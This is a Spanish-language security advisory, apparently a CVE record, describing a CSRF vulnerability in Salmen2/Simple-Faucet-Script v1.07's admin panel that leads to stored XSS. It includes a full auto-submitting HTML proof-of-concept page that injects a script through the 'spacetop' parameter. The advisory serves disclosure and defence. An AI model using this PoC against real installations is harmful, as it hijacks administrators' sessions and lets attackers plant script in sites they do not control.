
Una vulnerabilidad de Cross-Site Request Forgery (CSRF) en Salmen2/Simple-Faucet-Script v1.07 a través de una solicitud POST manipulada a admin.php?p=ads&c=1 que permite a los atacantes ejecutar código arbitrario.
Una vulnerabilidad de Cross-Site Request Forgery (CSRF) en Salmen2/Simple-Faucet-Script v1.07 a través de una solicitud POST manipulada a admin.php?p=ads&c=1 que permite a los atacantes ejecutar código arbitrario.
CWE-352: Cross-Site Request Forgery (CSRF)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
El producto es vulnerable a Cross-Site Request Forgery (CSRF) en el panel de administración. Cuando un administrador autenticado visita una página maliciosa que contiene el PoC, el ataque CSRF provoca la modificación no autorizada del contenido de la página de inicio.
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h3>Standard CSRF PoC</h3>
<form action="https://example.com/admin.php?p=ads&c=1" method="post">
<input type="hidden" name="spacetop" value="<script>alert();</script>" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Un atacante puede inyectar HTML/JavaScript arbitrario en la página de inicio a través del parámetro spacetop, lo que conduce a Cross-Site Scripting (XSS) almacenado.
Muntadhar M. Ahmed (almuntadhar0x01)